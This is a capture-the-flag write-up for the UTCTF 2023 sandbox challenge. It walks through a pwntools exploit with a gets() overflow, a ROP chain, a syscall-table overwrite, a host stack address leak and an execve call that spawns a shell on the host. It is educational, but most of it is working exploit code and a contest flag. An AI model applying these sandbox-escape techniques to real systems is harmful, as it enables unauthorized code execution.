# UTCTF 2023: UTCTF Sandbox

## Description

New sandboxing solution just dropped

Run with: ./loader hello

By ggu

## Flag

```
utflag{wh0_n33ds_w4sm_when_u_h4ve_q3mu}
```

## Summary

Using some bugs in vm syscall system you need
to find a way to have a string at known address
in host's memory and then make host allow you
to execute execve syscall

## Detailed solution

### Guest program

Exploiting guest program is very simple as it
is a simple program with `gets` function used,
and both stack protector and ASLR disabled

```c
int main()
{
  char v8[256]; // [rsp+10h] [rbp-100h] BYREF

  puts("Welcome to the UTCTF secure sandbox environment. Please enter your name: ");
  gets(v8);
  printf("hello, %s\n", v8);
  return 0;
}
```

To start ROP chain in this program following code
is needed

```python
#!/bin/python

from pwn import *

context.terminal = ['alacritty', '-e', 'sh', '-c']

MAIN = p64(0x4000129)

POP_RSI_R15 = p64(0x40013ad)

POP_RDI = p64(0x40013af)
POP_RDX = p64(0x40023b3)
POP_RAX = p64(0x0401001)
SYSCALL = p64(0x40024ab)
LEAVE   = p64(0x4000185)

io = remote('puffer.utctf.live', 7132)

payload = (
        b'A' * 256 +
        RBP_VALUE +
        POP_RAX + p64(1337)
```

This way it is possible to use arbitrary syscall
on the guest system with arbitrary arguments

### Available syscalls

The host system handles incoming syscalls using
`hook_syscall` function

There are following syscalls declared:

 - read `0` - pretty good read syscall proxy, however
    it can be leaking data from host to guest ( more
    information later )
 - write `1` - it uses printf in order to show what
    guest wanted to print, it has buffer overflow that
    can be used to trigger stacksmashing, but no other
    bugs
 - writev `20` - some more complicated write function
 - `16`, `158`, `218` - those syscalls just set a register
    on the guest to `0`
 - syscalls in `exit_syscalls` table - can be called
    with arbitrary arguments, the table is located in
    writable data section
 - \<unknown\> `1024` - this syscalls allows you to write
    number of syscalls that have been handled into
    arbitrary `bss` location

### Allowing for execve syscalls

The `1024` syscalls allows to write the number of syscalls
handled to following memory location

```
&stack@bss - constant + $rdi
```

It can be used to overwrite the `exit_syscalls` table
as the difference beetween addresses of that table and
the `stack` variable is the same every time

The offests from IDA

```python
EXIT_SYSCALLS_IDA   = 0x1E4C010
STACK_BSS_IDA       = 0x1EC69A0
DIFF                = 0x7F0000

REQUIRED_RDI = EXIT_SYSCALLS_IDA + DIFF - STACK_BSS_IDA

log.info("Rdi required for 1024 syscall: " + str(REQUIRED_RDI))
```

When syscall `1024` will be executed with calculated `rdi`
it will overwrite the `exit_syscalls` table

In order to set syscall count to `59` - execve, it is
needed to add some `main` functions to the ROP chain
and a single syscall that will just set a register

Main function is used in here just because it increments
syscall counter by 3 for 8 bytes of the stack used, if
nop syscalls were used every time they would increment
the counter by 1 for every 24 bytes of payload

Overwriting the table

```python
MAIN_CNT = 17

payload = (
        b'A' * 256 +
        RBP_VALUE +

        # increment syscall_cnt
        MAIN * MAIN_CNT +

        # increment syscall_cnt
        POP_RAX + p64(16) +
        SYSCALL +

        # enable execve
        POP_RAX + p64(1024) +
        POP_RDI + p64(REQUIRED_RDI) +
        SYSCALL
)

for i in range(MAIN_CNT):
    io.recvline()
    io.recvline()
    io.sendline(b'AAAAAAAAA')

log.info("Finished with mains")

io.recvline()
```

Supplying dummy data to every `gets` function is also
needded and done in the for loop

### Leaking host address

The guest program can now call `execve` syscall on the
host, however it needs to provide address to a path to
executable located in the host address space

Thankfully the read syscall has a bug as it will always
copy the ammount of bytes requested by the guest program
into its memory, not the amount that the OS has provided

```c
v16 = read(__rdi, v7, __rdx);
uc_reg_write(v8, 35LL, &v16);
uc_mem_write(v8, __rsi, buf, __rdx);
```

It is also worth noting that the buffer for the read
call located on the stack, so there could be some
residual stack pointers lying in the copied memory

In fact if following syscall gets executed

```python
        # enable execve
        POP_RAX + p64(1024) +
        POP_RDI + p64(REQUIRED_RDI) +
        SYSCALL +

        # leak stack address
        POP_RAX + p64(0) +
        POP_RDI + p64(0) +
        POP_RSI_R15 + p64(0x7ff000) + p64(0xdeadbeef) +
        POP_RDX + p64(2264) +
        SYSCALL
```

in a debugger some host ctack pointers can be found
and copied to the guest memory

```
gef> x/100xg $rsi
0x7fffffffcfe0:	0x0000000000000008	0x0000000000001000
0x7fffffffcff0:	0x0000000004005000	0x00007fffffffd020
0x7fffffffd000:	0x0000555555fa7c26	0x0000000004005268
0x7fffffffd010:	0x0000000000001000	0x0000000004005000
0x7fffffffd020:	0x00007fffffffd050	0x0000555555fa8267
```

There is stack address at memory address of `0x7fffffffcff0`
it will also be simple to write some data to that address

Now the guest program will have that address at the memory
location of `0x7ff018` and whatever is provided by read
syscall at 3 previous QWORDs

### Finishing ROP chain

In order to execute execve syscall it is required to
pop the host address from the stack into the `rdi`
register, we can do so by passing `POP_RDI` together
with some padding into the 'leak stack address' read
call, the reason for the padding will be explained later

```python
log.info("Finished with mains")

io.recvline()
io.send(b'AAAAAAAA' * 2 + POP_RDI)

pause()
```

Now the memory at address `0x7ff000` looks like

```
PADDING, PADDING, POP_RDI, HOST_STACK_ADDR
```

To actually use the syscall 2nd payload will be loaded
to memory address `0x7ff020`

```python
payload_2 = (
        POP_RAX + p64(59) +
        POP_RSI_R15 + p64(0) + p64(0xdeadbeef) +
        POP_RDX + p64(0) +
        SYSCALL
)
```

its only job is to call the execve syscall with `rdi`
set to host memory address in which '/bin/sh' will be put

To load this payload another read syscall will be used

```python
        # leak stack address
        POP_RAX + p64(0) +
        POP_RDI + p64(0) +
        POP_RSI_R15 + p64(0x7ff000) + p64(0xdeadbeef) +
        POP_RDX + p64(2264) +
        SYSCALL +

        # read additional payload
        POP_RAX + p64(0) +
        POP_RDI + p64(0) +
        POP_RSI_R15 + p64(0x7ff020) + p64(0xdeadbeef) +
        POP_RDX + p64(512) +
        SYSCALL +

        # jump to the 2nd payload part
        LEAVE
```

And the payload will be provided to the read syscall

```python
io.recvline()
io.send(b'AAAAAAAA' * 2 + POP_RDI)

pause()
io.sendline(payload_2)

pause()
```

The leave gadget can be used to jump to different
part of the stack, here it is used to jump right onto
the padding provided while leaking host addresses

As leave instruction both sets `rsp` to the value
of `rbp` and pops value of `rbp` from the stack it
is required to have 8 bytes of padding before 2nd
part of the payload

Therefor `RBP_VALUE` placeholder used earlier has
to be set to `0x7ff008`

### Setting host memory

Now that everything is in place the `execve` syscall
will be run hovewer the host memory at leaked address
still has to be set to '/bin/sh'

In order to do so `read` syscall can be used again
with dummy target address set and length the same as
when the stack address was leaked

```python
        # read additional payload
        POP_RAX + p64(0) +
        POP_RDI + p64(0) +
        POP_RSI_R15 + p64(0x7ff020) + p64(0xdeadbeef) +
        POP_RDX + p64(512) +
        SYSCALL +

        # read bytes into the host memory
        POP_RAX + p64(0) +
        POP_RDI + p64(0) +
        POP_RSI_R15 + p64(0x7ff100) + p64(0xdeadbeef) +
        POP_RDX + p64(2264) +
        SYSCALL +

        # jump to 2nd payload
        LEAVE
```

And right after sending 2nd payload host's memory
can be filled with '/bib/sh' s just to make sure
we did not miss the address

```python
pause()
io.sendline(payload_2)

pause()
io.sendline('/bin/sh\x00' * 20)

pause()
io.interactive()
```

### Getting the flag

The flag is present at remote host in CWD in a file named flag.txt
